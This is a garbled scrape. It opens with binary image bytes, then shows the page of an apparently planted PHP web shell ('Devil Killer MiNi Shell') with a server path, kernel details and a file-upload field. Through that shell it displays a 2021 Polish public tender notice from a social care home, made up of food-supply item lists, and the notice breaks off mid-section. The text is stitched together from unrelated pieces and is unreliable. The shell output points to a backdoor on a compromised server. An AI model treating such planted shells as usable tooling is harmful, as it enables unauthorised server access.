JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211118/0027398201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy artykułów spożywczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej w Więckowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000297922</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słoneczna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Więckowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 285 16 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wieckowicezam@poczta.onet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dpswieckowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy artykułów spożywczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45673843-4724-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00273982</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dpswieckowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) https://miniportal.uzp.gov.pl <br/>2) https:/dpswieckowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Zasady użycia mini Portalu opisano w regulaminie korzystania z mini Portalu pod adresem https://miniportal.uzp.gov.pl/Warunkiuslugi.aspx oraz regulaminie ePUAP<br/>2. Zasady obsługi strony internetowej : komputer PC z drukarką, dostęp do Internetu: Word, pdf, Excel opcjonalnie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 468168 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 405937 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawy mleka i jego przetworów :<br/>Jogurt naturalny op. 150 g. o zawartości tłuszczu 0%-2% w 100g jogurtu, gęsty szt 1300<br/>Jogurt owocowy op.150 g.o zawartości tłuszczu 0% -2 % w 100g jogurtu, smak truskawkowy, brzoskwiniowy, malinowy, z owoców leśnych, ananasowy, gęsty, z widocznymi kawałkami owoców (zawartość owoców min.3,5%). szt3100<br/>Kefir op. do 1 l. o zawartości tłuszczu 2% w 100g kefiru.	l 170<br/>Margaryna Palma a 250 g. o zawartości tłuszczu 80%	kg 155<br/>Masło ekstra, z zawartością tłuszczu zwierzęcego (mlekowego), nie mniej niż 82%, z zawartością wody poniżej 17%, niesłone (nie więcej niż 2% soli) - w 100g masła. Nie posiadające tłuszczów innego pochodzenia (np. oleje, margaryny), o stałej konsystencji.Pakowane w kostki 200g kg 1531<br/>Maślanka naturalna opak do 1 l. zawartość tłuszczu 2%	l 125<br/>Maślanka owocowa jagodowa, truskawkowa, brzoskwiniowa op. do 1 l	l 345<br/>Mleko krowie o zawartości tłuszczu 2% w litrze mleka, pakowane w worki foliowe do10 l, worki nieuszkodzone, czyste. L 17 700<br/>Mleko w proszku op.do 0,5kg spożywcze, krowie,pełne, niegranulowane. kg	10<br/>Mleko zagęszczone niesłodzone opakowanie 0,5 l l	60<br/>Ser biały półtłusty , niekwaśny, o zawartości tłuszczu 4% w 100g sera	kg	1480<br/>Ser topiony o zawartości tłuszczu nie mniej niż 20% w 100g suchej masy. Smaki: naturalny, oraz z dodatkami: szynki, papryki, szczypiorku, pieczarek. Waga 1szt - 100g.	kg	63<br/>Ser żółty Gouda lub Edamski posiadający nie mniej niż 27 gram tłuszczu zwierzęcego ( mlekowego) w 100 gram sera, nieposiadający tłuszczów innego pochodzenia (np.oleje, margaryny), kawałki o wadze 3-4 kg, nie łamiący się	kg	115<br/>Serek Bieluch lub równoważny opak.100 gram, o zawartości tłuszczu nie mniej niż 3 gram, węglowodanów 4,5 gram, białka 9 gram - w 100 gramach serka.	kg	50<br/>Serek do chleba op. do 100 g śmietankowy, z ziołami, ze szczypiorkiem, z czosnkiem, z ogórkiem i koperkiem, z papryką, z chrzanem o zawartości tłuszczu nie mniej niż 15 gram, węglowodanów 3 gram , białka 5 gram- w 100 gramach serka.	kg	210<br/>Serek fromage a 100 g , naturalny, o smaku: śmietankowym, czosnkowym, chrzanowym, warzywnym.	kg	50<br/>Serek grani ziarnisty op. do 200 g , widoczne granulki sera, oddzielające się od śmietanki, o zawartości tłuszczu 3-5% w 100g serka. kg	430<br/>Serek homo naturalny op. do 200 g o zawartości tłuszczu 3 - 7 % w 100g serka.	kg	80<br/>Serek homo owocowy op. do 200 g o zawartości tłuszczu 3 - 7 % w 100g serka.	kg	140<br/>Serek kanapkowy naturalny, ze szczypiorkiem, z czosnkiem, z papryką op. do 150 g o zawartości tłuszczu nie mniej niż 14 gram, węglowodanów 6 gram , białka 6 gram- w 100 gramach serka.	kg	105<br/>Serek Ostrowia lub równoważny mix.op 120 g o zawartości tłuszczu 23 g., białka5 g, węglowodanów 4 g- w 100 gramach serka	kg	300<br/>Śmietana opakowanie twarde do 5 l. o zawartości tłuszczu 18% w litrze śmietany, homogenizowana, słodka, bez grudek	l	1480 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 116095 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Artykuły spożywcze sypkie i inne:1	Andruty wafle cukrzycowe opak do 110 g.	kg	124<br/>2	Budyń bez cukru opak.do 1 kg., smak śmietankowy, waniliowy, czekoladowy, malinowy.	kg	130<br/>3	Bulion drobiowy Winiary	kg	3<br/>4	Chrupki krakowskie a 350g.	szt	80<br/>5	Ciastka deserowe nadziewane lub w czekoladzie , których termin przydatności do spożycia wynosi minimum 14 dni a maksymalnie 45 dni od daty produkcji	kg	225<br/>6	Ciastka herbatniki szkolne	kg	15<br/>7	Ciastka Krakersy Lajkonik lub równoważne o wartości energetycznej 476 kcal,21gram tłuszczu, 62 gramy węglowodanów na 100gram krakersów opakowanie 180 g	kg	30<br/>8	Ciastka typu Grześki w czekoladzie a 36g. kg	74<br/>9	Cukier opak do 1 kg.	kg	2400<br/>10	Cukier puder opak.do 0,5 kg	kg	125<br/>11	Cukier waniliowy opak do 1 kg.	kg	10,5<br/>12	Cukierki w czekoladzie- mieszanka krakowska	kg	24<br/>13	Cynamon opak do 1 kg.	kg	1<br/>14	Czekolada dla diabetyków opak.do 100 g	kg	20<br/>15	Czosnek granulowany opak do 1 kg.	kg	25<br/>16	Drożdże piekarskie opak.do 100 g.	kg	9,5<br/>17	Galaretka owocowa opakowanie do1kg, smak: truskawkowa, wiśniowa, agrestowa, brzoskwiniowa i cytrynowa, o zawartości żelatyny wieprzowej.	kg	165<br/>18	Herbata ekspresowa owocowa (ze sznureczkiem) różne smaki Vitax op.-20 szt.	op.	350<br/>19	Herbata liściasta Madras opak.do 1 kg.	kg	155<br/>20	Kakao Wawel lub równoważne opakowanie = 100g, sypkie, bez cukru, ekstra , ciemne, niskotłuszczowe o zaw. 10 – 12% w100g suchej masy	kg	10<br/>21	Kasza jęczmienna sypka, średnia, pakowana w torebki 1kg kg	120<br/>22	Kasza manna sypka, pakowana w torebki 1kg	kg	180<br/>23	&#34;Kawa zbożowa Kujawianka lub równoważna opak do 0,5 kg., składniki: żyto prażone 60%, jęczmień 20%, cykoria, burak prażony<br/><br/><br/><br/>&#34;	kg	130<br/>24	Ketchup Roleski lub równoważny- łagodny, opakowanie plastik do 500g, gęsty, produkowany z pomidorów( 205 gram pomidorów w 100 gram ketchupu) , o intensywnej, czerwonej barwie, bez konserwantów,zagęstników i dodatków &#34;E&#34;	kg	80<br/>25	Ketchup Roleski lub równoważny -pikantny, opakowanie plastik do 500g, gęsty, produkowany z pomidorów( 205 gram pomidorów w 100 gram ketchupu) , o intensywnej, czerwonej barwie, bez konserwantów,zagęstników i dodatków &#34;E&#34;	kg	80<br/>26	Kisiel bez cukru opak.do 1 kg. smak: malinowy, morelowy, wiśniowy,truskawkowy i cytrynowy. kg.	115<br/>27	Kleik ryżowy Bobovita lub równoważny błyskawiczny zawierający 99,9% mąki ryżowej,opak do 200 g.	kg	4<br/>28	Kminek opak do 1 kg.	kg	1<br/>29	Konserwa rybna-śledź w oleju opak. 300 g.-330 gram, zawartość śledzia minimum 55% w 100 gramach produktu	kg	44<br/>30	Konserwa rybna-śledź w pomidorach opak. 300 g.-330 gram zawartość śledzia minimum 55% w 100 gramach produktu	kg	44<br/>31	Kwasek cytrynowy opak.do 1 kg.	kg	19<br/>32	LiśćLaurowy opak. Do 1 kg	kg	1,6<br/>33	Majeranek opak do 0,2 kg.	kg	1,5<br/>34	Majonez Roleski lub równoważny opak. do 1 kg ,stołowy o zawartości tłuszczu nie mniej niż 51% i jaj kurzych nie mniej niż 11% w 100g majonezu, bez konserwantów, gęsty, barwa kremowa kg	335<br/>35	Makaron drobny 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	300<br/>36	Makaron nitki 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	150<br/>37	Makaron Łazanki 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	70<br/>38	Makaron różny 4-ro jajeczny ,wysokiej jakości – zachowujący kształt po ugotowaniu,pakowany po 0,50kg;	kg	315<br/>39	Makrela wędzona	kg	200<br/>40	Mąka pszenna tortowa typ 450 , pakowana w torebki 1kg sypka, barwa jasno kremowa.	kg	2300<br/>41	Mąka ziemniaczana opak do 1 kg.	kg	110<br/>42	Miód naturalny wielokwiatowy , płynny opak.do 400g.	kg	75<br/>43	Musztarda delikatesowa Roleski lub równoważna opak do 0,5 kg.bezkonserwantów,zagęstników, stabilizatorów i dodatków &#34;E&#34;	kg	55<br/>44	Ocet 10% opak do 0,5 l	l	33<br/>45	Olej butelka do1litra, roślinny, z pierwszego tłoczenia, o niskiej zawartości kwasu eurukowego, nadający się do pieczenia i smażenia.	l	440<br/>46	Oregano opak do 50 g.	kg	0,2<br/>47	Paluszki słone Lajkonik lub równoważne , mające 374 kcal w 100 gramach paluszków opak.do 300 g.	kg	150<br/>48	Pieprz naturalny czarny mielony 100% opak do 1 kg, w składzie tylko pieprz, bez innych dodatków.	kg	26<br/>49	Płatki kukurydziane bez dodatków smakowych CornFlakesopak.do 1 kg.	kg	60<br/>50	&#34;Płatki owsiane górskie ,barwa swoista dla produktu, pakowane w torebki od 0,50 kg - 1kg, klasa I<br/><br/>&#34;	kg	90<br/>51	Proszek do pieczenia opak do 50 g.	kg	3<br/>52	Przyprawa do kurczaka złocista Kamis lub równoważna opak do 1 kg., o zawartości : sól, papryka słodka 14%,gorczyca biała, czosnek-5,8%,, kolendra, kurkuma, kozieradka-2,4%, chili-2% imbir, cynamon, kmin, goździki, gałka muszkatałowa.	kg	4,5<br/>53	Przyprawa do mięsa Kamis lub równoważna opak do 1 kg. o zawartości:sól, czosnek, gorczyca, kminek,kolendra, papryka słodka, majeranek, cząber, rozmaryn, chili.	kg	0,5<br/>54	Przyprawa do potraw &#34;Kucharek&#34; lub równoważna , o zawartości minimum 15, 5% suszonych warzyw. opak do 1 kg.,	kg	75<br/>55	Przyprawa w płynie do zup Winiary a 1l.	l	185<br/>56	Rodzynki opakowanie od 0,50kg do 1kg, owoc średniej wielkości, typu sułtańskie	kg	39<br/>57	Ryż barwa biała, długo ziarnisty, pakowany w torebki 1kg, klasa I	kg	435<br/>58	Sól kuchenna jodowana opak do 1 kg.	kg	660<br/>59	Śledzie solone Matias opak 3kg.po odcieku 2 kg.	kg	160<br/>60	Śledzie solone Matias opak 5kg.po odcieku 4 kg.	kg	160<br/>61	Śliwki suszone bez pestek opak do 250 g.	kg	6<br/>62	Śmietana śnieżka opak do 60 g.	kg	34<br/>63	Wiórka kokosowe opak do 100 g.	kg	19<br/>64	Ziele angielskie opak do 1 kg.	kg	5,5<br/>65	Żelatyna wieprzowa opakowanie do 1 kg.	kg	20<br/>66	Soda oczyszczona	kg	0,6 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 69520 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przetwory owocowe i warzywne: 1	Barszcz biały op. do 0,5 l butelka , kiszony, z mąki żytniej;	l	180<br/>2	Barszcz czerwony koncentrat Krakus lub równoważny op do 0,3 l. zawierający zagęszczony sok z buraków czerwonych 59,2%	l	78<br/>3	Brzoskwinie w syropie a 850g w puszce, op. 0,850-1 kg, bez pestek, krojone w połówki	szt	20<br/>4	Chrzan tarty Polonaise lub równoważny op. do 200 g. min. 62% chrzanu,102 kcal, tłuszcz 07 g, białko 2,7 g na 100g produktu	kg	121<br/>5	Dżem bez cukru op. do 400 g.z kawałkami owoców, różne smaki, bez konserwantów, sporządzony z min 40% owoców na 100g produktu	kg	470<br/>6	Groszek konserwowy op. do 400 g. z otwieraczem, sałatkowy, średnie ziarna	kg	170<br/>7	&#34;Koncentrat pomidorowy 28-30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, min.104 kcal., tłuszcz 0,8 g., węglowodany18 g na 100 g produktu, PUDLISZKI lub równoważny opakowanie do 1 kg pasteryzowany, bez konserwantów 28- 30% Pudliszki op.do 1 kg &#34;	kg	220<br/>8	&#34;Koncentrat pomidorowy 28-30% wyprodukowany ze świeżych pomidorów, bez żadnych dodatków, min.104 kcal., tłuszcz 0,8 g., węglowodany18 g na 100 g produktu, PUDLISZKI lub równoważny opakowanie do 200 g.<br/><br/>pasteryzowany, <br/>bez <br/>konserwantów 28- 30% Pudliszki op.do 1 kg &#34;	kg	20<br/>9	Kukurydza konserwowa op. do 400 g. z otwieraczem, sałatkowa, półsłodka	kg	190<br/>10	Marmolada owocowa twarda o smaku różanym op. do 1 kg	kg	45<br/>11	Nektar czarna porzeczka zaw. sok z czarnych porzeczek z zagęszczonego soku min.(25%) , zaw. w 100 ml 49 kcal,wit. C 6 mg. TYMBARK lub równoważny a 1 l.	l	200<br/>12	Papryka konserwowa czerwona półsłodka op. do 1 lit.	kg	460<br/>13	Pieczarki marynowane op. do 1 lit. grzyby całe w zalewie octowej	kg	190<br/>14	Powidło śliwkowe	kg	30<br/>15	Sałatka szwedzka op. do 1 lit.	kg	420<br/>16	Sałatka z czerwonej kapusty z dod. jabłka o smaku łagodnym op. do 1 lit.	kg	45<br/>17	Sok jabłkowy 100 % z zagęszczonego soku jabłkowego zaw. w 100 ml. 43 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.	l	300<br/>18	Sok multiwitamina z zagęszczonych soków z: jabłek (60%) i pomarańczy (22%), sok z marchwi z zagęszczonego soku (12%), przeciery z: bananów (3%), brzoskwiń, gujawy i papai, soki z zagęszczonych soków z: ananasów (2%), mango (0,5%), marakui (0,1%), liczi (0,05%), figi kaktusowej, kiwi i limonek,zaw. w 100 ml.51 kcal, wit. C-12 mg. - TYMBARK lub równoważny opak.1 l.	l	300<br/>19	Sok pomarańczowy 100 % z zagęszczonego soku pomarańczowego zaw. w 100 ml. 45 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 1 l.	l	400<br/>20	Sok pomarańczowy 100 % z zagęszczonego soku pomarańczowego zaw. w 100 ml. 45 kcal, wit. C 6 mg-TYMBARK lub równoważny opak. 200 ml.	l	40<br/>21	Syrop o smaku malinowym, wysokosłodzony, pasteryzowany,bez substancji konserwujących zaw. min.3% zagęszczonego soku malinowego	l	100 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 26913 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 